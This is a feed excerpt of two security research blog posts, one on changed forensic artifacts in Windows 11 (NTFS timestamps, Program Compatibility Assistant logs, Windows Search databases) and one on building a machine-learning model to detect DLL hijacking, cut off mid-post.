behavior</h3><p>The behavior of NTFS attributes was changed between Windows 10 and Windows 11 in two $MFT structures: $STANDARD_INFORMATION and $FILE_NAME.</p><p>The changes to the behavior of the $STANDARD_INFORMATION attributes are presented in the table below:</p><table><tbody><tr><td><strong>Event</strong></td><td>Access file</td><td>Rename file</td><td>Copy file to new folder</td><td>Move file within one volume</td><td>Move file between volumes</td></tr><tr><td><strong>Win 10<br />1903</strong></td><td>The File Access timestamp is updated. However, it remains unchanged if the system volume is larger than 128 GB</td><td>The File Access timestamp remains unchanged</td><td>The copy metadata is updated</td><td>The File Access timestamp remains unchanged</td><td>The metadata is inherited from the original file</td></tr><tr><td><strong>Win 11 24H2</strong></td><td>The File Access timestamp is updated</td><td>The File Access timestamp is updated to match the modification time</td><td>The copy metadata is inherited from the original file</td><td>The File Access timestamp is updated to match the moving time</td><td>The metadata is updated</td></tr></tbody></table><p>Behavior of the $FILENAME attributes was changed as follows:</p><table><tbody><tr><td><strong>Event</strong></td><td>Rename file</td><td>Move file via Explorer within one volume</td><td>Move file to Recycle Bin</td></tr><tr><td><strong>Win 10<br />1903</strong></td><td>The timestamps and metadata remain unchanged</td><td>The timestamps and metadata remain unchanged</td><td>The timestamps and metadata remain unchanged</td></tr><tr><td><strong>Win 11 24H2</strong></td><td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td><td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td><td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td></tr></tbody></table><p>Analysts should consider these changes when examining the service files of the NTFS file system.</p><h3 id="program-compatibility-assistant">Program Compatibility Assistant</h3><p>Program Compatibility Assistant (PCA) first appeared way back in 2006 with the release of Windows Vista. Its purpose is to run applications designed for older operating system versions, thus being a relevant artifact for identifying evidence of program execution.</p><p>Windows 11 introduced new files associated with this feature that are relevant for forensic analysis of application executions. These files are located in the directory <code>C:\Windows\appcompat\pca\</code>:</p><ul><li><code>PcaAppLaunchDic.txt</code>: each line in this file contains data on the most recent launch of a specific executable file. This information includes the time of the last launch formatted as YYYY-MM-DD HH:MM:SS.f (UTC) and the full path to the file. A pipe character (|) separates the data elements. When the file is run again, the information in the corresponding line is updated. The file uses ANSI (CP-1252) encoding, so executing files with Unicode in their names “breaks” it: new entries (including the entry for running a file with Unicode) stop appearing, only old ones get updated.</li></ul><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117684" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png" alt="" width="1007" height="306" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png 1007w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-300x91.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-768x233.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-740x225.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-921x280.png 921w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-800x243.png 800w" sizes="auto, (max-width: 1007px) 100vw, 1007px" /></a></p><ul><li><code>PcaGeneralDb0.txt</code> and <code>PcaGeneralDb1.txt</code> alternate during data logging: new records are saved to the primary file until its size reaches two megabytes. Once that limit is reached, the secondary file is cleared and becomes the new primary file, and the full primary file is then designated as the secondary. This cycle repeats indefinitely. The data fields are delimited with a pipe (|). The file uses UTF-16LE encoding and contains the following fields:<ul><li>Executable launch time (YYYY-MM-DD HH:MM:SS.f (UTC))</li><li>Record type (0–4):<ul><li>0 = installation error</li><li>1 = driver blocked</li><li>2 = abnormal process exit</li><li>3 = PCA Resolve call (component responsible for fixing compatibility issues when running older programs)</li><li>4 = value not set</li></ul></li><li>Path to executable file. This path omits the volume letter and frequently uses environment variables (%USERPROFILE%, %systemroot%, %programfiles%, and others).</li><li>Product name (from the PE header, lowercase)</li><li>Company name (from the PE header, lowercase)</li><li>Product version (from the PE header)</li><li>Windows application ID (format matches that used in <a href="https://securelist.com/amcache-forensic-artifact/117622/" target="_blank" rel="noopener">AmCache</a>)</li><li>Message</li></ul></li></ul><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117685" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png" alt="" width="2390" height="341" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png 2390w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-300x43.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1024x146.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-768x110.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1536x219.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-2048x292.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-740x106.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1600x228.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-800x114.png 800w" sizes="auto, (max-width: 2390px) 100vw, 2390px" /></a></p><p>Note that these text files only record data related to program launches executed through Windows File Explorer. They do not log launches of executable files initiated from the console.</p><h3 id="windows-search">Windows Search</h3><p>Windows Search is the built-in indexing and file search mechanism within Windows. Initially, it combed through files directly, resulting in sluggish and inefficient searches. Later, a separate application emerged that created a fast file index. It was not until 2006’s Windows Vista that a search feature was fully integrated into the operating system, with file indexing moved to a background process.</p><p>From Windows Vista up to and including Windows 10, the file index was stored in an Extensible Storage Engine (ESE) database:<br /><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.edb</code>.</p><p>Windows 11 breaks this storage down into three SQLite databases:</p><ul><li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows-gather.db</code> contains general information about indexed files and folders. The most interesting element is the SystemIndex_Gthr table, which stores data such as the name of the indexed file or directory (FileName column), the last modification of the indexed file or directory (LastModified), an identifier used to link to the parent object (ScopeID), and a unique identifier for the file or directory itself (DocumentID). Using the ScopeID and the SystemIndex_GthrPth table, investigators can reconstruct the full path to a file on the system. The SystemIndex_GthrPth table contains the folder name (Name column), the directory identifier (Scope), and the parent directory identifier (Parent). By matching the file’s ScopeID with the directory’s Scope, one can determine the parent directory of the file.</li><li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.db</code> stores information about the metadata of indexed files. The SystemIndex_1_PropertyStore table is of interest for analysis; it holds the unique identifier of the indexed object (WorkId column), the metadata type (ColumnId), and the metadata itself. Metadata types are described in the SystemIndex_1_PropertyStore_Metadata table (where the content of the Id column corresponds to the ColumnId content from SystemIndex_1_PropertyStore) and are specified in the UniqueKey column.</li><li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows-usn.db</code> does not contain useful information for forensic analysis.</li></ul><p>As depicted in the image below, analyzing the <code>Windows-gather.db</code> file using DB Browser for SQLite can provide us evidence of the presence of certain files (e.g., malware files, configuration files, files created and left by attackers, and others).<br /><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png" alt="" width="1234" height="667" class="aligncenter size-full wp-image-117735" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png 1234w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-1024x553.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-648x350.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-800x432.png 800w" sizes="auto, (max-width: 1234px) 100vw, 1234px" /></a><br />It is worth noting that the LastModified column is stored in the Windows FILETIME format, which holds an unsigned 64-bit date and time value, representing the number of 100-nanosecond units since the start of January 1, 1601. Using a utility such as DCode, we can see this value in UTC, as shown in the image below.<br /><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png" alt="" width="1062" height="434" class="aligncenter size-full wp-image-117736" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png 1062w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-300x123.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-1024x418.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-768x314.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-856x350.png 856w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-740x302.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-685x280.png 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-800x327.png 800w" sizes="auto, (max-width: 1062px) 100vw, 1062px" /></a></p><h3 id="other-minor-changes-in-windows-11">Other minor changes in Windows 11</h3><p>It is also worth mentioning a few small but important changes in Windows 11 that do not require a detailed analysis:</p><ul><li>A complete discontinuation of NTLMv1 means that pass-the-hash attacks are gradually becoming a thing of the past.</li><li>Removal of the well-known Windows 10 Timeline activity artifact. Although it is no longer being actively maintained, its database remains for now in the files containing user activity information, located at: <code>%userprofile%\AppData\Local\ConnectedDevicesPlatform\ActivitiesCache.db</code>.</li><li>Similarly, Windows 11 removed Cortana and Internet Explorer, but the artifacts of these can still be found in the operating system. This may be useful for investigations conducted in machines that were updated from Windows 10 to the newer version.</li><li><a href="https://github.com/AndrewRathbun/Windows11Research/tree/main/EventLogs/4624" target="_blank">Previous research</a> also showed that Event ID 4624, which logs successful logon attempts in Windows, remained largely consistent across versions until a notable update appeared in Windows 11 Pro (22H2). This version introduces a new field, called Remote Credential Guard, marking a subtle but potentially important change in forensic analysis. While its real-world use and forensic significance remain to be observed, its presence suggests Microsoft’s ongoing efforts to enhance authentication-related telemetry.</li><li>Expanded support for the ReFS file system. The latest Windows 11 update preview made it possible to install the operating system directly onto a ReFS volume, and BitLocker support was also introduced. This file system has several key differences from the familiar NTFS:<ul><li>ReFS does not have the $MFT (Master File Table) that forensics specialists rely on, which contains all current file records on the disk.</li><li>It does not generate short file names, as NTFS does for DOS compatibility.</li><li>It does not support hard links or extended object attributes.</li><li>It offers increased maximum volume and single-file sizes (35 PB compared to 256 TB in NTFS).</li></ul></li></ul><h2 id="conclusion">Conclusion</h2><p>This post provided a brief overview of key changes to Windows 11 artifacts that are relevant to forensic analysis – most notably, the changes of PCA and modifications to Windows Search mechanism. The ultimate utility of these artifacts in investigations remains to be seen. Nevertheless, we recommend you immediately incorporate the aforementioned files into the scope of your triage collection tool.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/forensic-artifacts-in-windows-11/117680/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>How we trained an ML model to detect DLL hijacking</title> <link>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/</link> <comments>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/#respond</comments> <dc:creator><![CDATA[Anna Pidzhakova]]></dc:creator> <pubDate>Mon, 06 Oct 2025 08:00:21 +0000</pubDate> <category><![CDATA[Research]]></category> <category><![CDATA[Security technology]]></category> <category><![CDATA[Machine learning]]></category> <category><![CDATA[DLL hijacking]]></category> <category><![CDATA[Threat hunting]]></category> <category><![CDATA[Artificial intelligence]]></category> <category><![CDATA[DLL]]></category><category><![CDATA[Cybersecurity]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117565</guid> <description><![CDATA[An expert at the Kaspersky AI expertise center explains how the team developed a machine-learning model to identify DLL hijacking attacks.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>DLL hijacking is a common technique in which attackers replace a library called by a legitimate process with a malicious one. It is used by both creators of mass-impact malware, like stealers and banking Trojans, and by APT and cybercrime groups behind targeted attacks. In recent years, the number of DLL hijacking attacks has grown significantly.</p><div class="js-infogram-embed" data-id="_/re1cVhfDkiTvQdIHwndC" data-type="interactive" data-title="01(2)_EN_RU_ES_PT-BR_DLL Hijacking charts" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Trend in the number of DLL hijacking attacks. 2023 data is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02132719/012en_ru_es_pt-br_dll-hijacking-charts.png" target="_blank" rel="noopener">download</a>)</em></p><p>We have observed this technique and its variations, like DLL sideloading, in targeted attacks on organizations in <a href="https://securelist.com/cobalt-strike-attacks-using-quora-github-social-media/117085/" target="_blank" rel="noopener">Russia</a>, <a href="https://securelist.com/apt41-in-africa/116986/" target="_blank" rel="noopener">Africa</a>, <a href="https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/" target="_blank" rel="noopener">South Korea</a>, and other countries and regions. <a href="https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/" target="_blank" rel="noopener">Lumma</a>, one of 2025’s most active stealers, uses this method for distribution. Threat actors trying to profit from popular applications, such as DeepSeek, also <a href="https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/#scheme-3-backdoors-and-attacks-on-chinese-users" target="_blank" rel="noopener">resort</a> to DLL hijacking.</p><p>Detecting a DLL substitution attack is not easy because the library executes within the trusted address space of a legitimate process. So, to a security solution, this activity may look like a trusted process. Directing excessive attention to trusted processes can compromise overall system performance, so you have to strike a delicate balance between a sufficient level of security and sufficient convenience.</p><h2 id="detecting-dll-hijacking-with-a-machine-learning-model">Detecting DLL hijacking with a machine-learning model</h2><p>Artificial intelligence can help where simple detection algorithms fall short. Kaspersky has been using machine learning for 20 years to identify malicious activity at various stages. The AI expertise center researches the capabilities of different models in threat detection, then trains and implements them. Our colleagues at the threat intelligence center approached us with a question of whether machine learning could be used to detect DLL hijacking, and more importantly, whether it would help improve detection accuracy.</p><h3 id="preparation">Preparation</h3><p>To determine if we could train a model to distinguish between malicious and legitimate library loads, we first needed to define a set of features highly indicative of DLL hijacking. We identified the following key features:</p><ul><li><strong>Wrong library location.</strong> Many standard libraries reside in standard directories, while a malicious DLL is often found in an unusual location, such as the same folder as the executable that calls it.</li><li><strong>Wrong executable location.</strong> Attackers often save executables in non-standard paths, like temporary directories or user folders, instead of %Program Files%.</li><li><strong>Renamed executable.</strong> To avoid detection, attackers frequently save legitimate applications under arbitrary names.</li><li><strong>Library size has changed, and it is no longer signed.</strong></li><li><strong>Modified library structure.</strong></li></ul><h3 id="training-sample-and-labeling">Training sample and labeling</h3><p>For the training sample, we used dynamic library load data provided by our internal automatic processing systems, which handle millions of files every day, and anonymized telemetry, such as that voluntarily provided by Kaspersky users through Kaspersky Security Network.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117583" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png" alt="" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a></p><p>The training sample was labeled in three iterations. Initially, we could not automatically pull event labeling from our analysts that indicated whether an event was a DLL hijacking attack. So, we used data from our databases containing only file reputation, and labeled the rest of the data manually. We labeled as DLL hijacking those library-call events where the process was definitively legitimate but the DLL was definitively malicious. However, this labeling was not enough because some processes, like “svchost”, are designed mainly to load various libraries. As a result, the model we trained on this data had a high rate of false positives and was not practical for real-world use.</p><p>In the next iteration, we additionally filtered malicious libraries by family, keeping only those which were known to exhibit DLL-hijacking behavior. The model trained on this refined data showed significantly better accuracy and essentially confirmed our hypothesis that we could use machine learning to detect this type of attacks.</p><p>At this stage, our training dataset had tens of millions of objects. This included about 20 million clean files and around 50,000 definitively malicious ones.</p><table><tbody><tr><td><strong>Status</strong></td><td><strong>Total</strong></td><td><strong>Unique files</strong></td></tr><tr><td>Unknown</td><td>~ 18M</td><td>~ 6M</td></tr><tr><td>Malicious</td><td>~ 50K</td><td>~ 1,000</td></tr><tr><td>Clean</td><td>~ 20M</td><td>~ 250K</td></tr></tbody></table><p>We then trained subsequent models on the results of their predecessors, which had been verified and further labeled by analysts. This process significantly increased the efficiency of our training.</p><h2 id="loading-dlls-what-does-normal-look-like">Loading DLLs: what does normal look like?</h2><p>So, we had a labeled sample with a large number of library loading events from various processes. How can we describe a “clean” library? Using a process name + library name combination does not account for renamed processes. Besides, a legitimate user, not just an attacker, can rename a process. If we used the process hash instead of the name, we would solve the renaming problem, but then every version of the same library would be treated as a separate library. We ultimately settled on using a library name + process signature combination. While this approach considers all identically named libraries from a single vendor as one, it generally produces a more or less realistic picture.</p><p>To describe safe library loading events, we used a set of counters that included information about the processes (the frequency of a specific process name for a file with a given hash, the frequency of a specific file path for a file with that hash, and so on), information about the libraries (the frequency of a specific path for that library, the percentage of legitimate launches, and so on), and event properties (that is, whether the library is in the same directory as the file that calls it).</p><p>The result was a system with multiple aggregates (sets of counters and keys) that could describe an input event. These aggregates can contain a single key (e.g., a DLL’s hash sum) or multiple keys (e.g., a process’s hash sum + process signature). Based on these aggregates, we can derive a set of features that describe the library loading event. The diagram below provides examples of how these features are derived:</p><div id="attachment_117584" style="width: 1468px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117584" class="size-full wp-image-117584" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png" alt="Feature extraction from aggregates" width="1458" height="546" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png 1458w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-1024x383.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-768x288.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-935x350.png 935w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-740x277.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-748x280.png 748w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-800x300.png 800w" sizes="auto, (max-width: 1458px) 100vw, 1458px" /></a><p id="caption-attachment-117584" class="wp-caption-text">Feature extraction from aggregates</p></div><h2 id="loading-dlls-how-to-describe-hijacking">Loading DLLs: how to describe hijacking</h2><p>Certain feature combinations (dependencies) strongly indicate DLL hijacking. These can be simple dependencies. For some processes, the clean library they call always resides in a separate folder, while the malicious one is most often placed in the process folder.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117585" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png" alt="" width="1264" height="278" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png 1264w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-300x66.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-1024x225.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-768x169.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-740x163.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-800x176.png 800w" sizes="auto, (max-width: 1264px) 100vw, 1264px" /></a></p><p>Other dependencies can be more complex and require several conditions to be met. For example, a process renaming itself does not, on its own, indicate DLL hijacking. However, if the new name appears in the data stream for the first time, and the library is located on a non-standard path, it is highly likely to be malicious.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117586" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png" alt="" width="1264" height="452" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png 1264w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-300x107.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-1024x366.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-768x275.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-979x350.png 979w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-740x265.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-783x280.png 783w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-800x286.png 800w" sizes="auto, (max-width: 1264px) 100vw, 1264px" /></a></p><h2 id="model-evolution">Model evolution</h2><p>Within this project, we trained several generations of models. The primary goal of the first generation was to show that machine learning could at all be applied to detecting DLL hijacking. When training this model, we used the broadest possible interpretation of the term.</p><p>The model’s workflow was as simple as possible:</p><ol><li>We took a data stream and extracted a frequency description for selected sets of keys.</li><li>We took the same data stream from a different time period and obtained a set of features.</li><li>We used type 1 labeling, where events in which a legitimate process loaded a malicious library from a specified set of families were marked as DLL hijacking.</li><li>We trained the model on the resulting data.</li></ol><div id="attachment_117587" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117587" class="size-full wp-image-117587" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png" alt="First-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117587" class="wp-caption-text">First-generation model diagram</p></div><p>The second-generation model was trained on data that had been processed by the first-generation model and verified by analysts (labeling type 2). Consequently, the labeling was more precise than during the training of the first model. Additionally, we added more features to describe the library structure and slightly complicated the workflow for describing library loads.</p><div id="attachment_117588" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117588" class="size-full wp-image-117588" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png" alt="Second-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117588" class="wp-caption-text">Second-generation model diagram</p></div><p>Based on the results from this second-generation model, we were able to identify several common types of false positives. For example, the training sample included potentially unwanted applications. These can, in certain contexts, exhibit behavior similar to DLL hijacking, but they are not malicious and rarely belong to this attack type.</p><p>We fixed these errors in the third-generation model. First, with the help of analysts, we flagged the potentially unwanted applications in the training sample so the model would not detect them. Second, in this new version, we used an expanded labeling that included useful detections from both the first and second generations. Additionally, we expanded the feature description through one-hot encoding — a technique for converting categorical features into a binary format — for certain fields. Also, since the volume of events processed by the model increased over time, this version added normalization of all features based on the data flow size.</p><div id="attachment_117589" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117589" class="size-full wp-image-117589" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png" alt="Third-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117589" class="wp-caption-text">Third-generation model diagram</p></div><h2 id="comparison-of-the-models">Comparison of the models</h2><p>To evaluate the evolution of our models, we applied them to a test data set none of them had worked with before. The graph below shows the ratio of true positive to false positive verdicts for each model.</p><div id="attachment_117590" style="width: 1639px" class="wp-caption aligncenter"><a 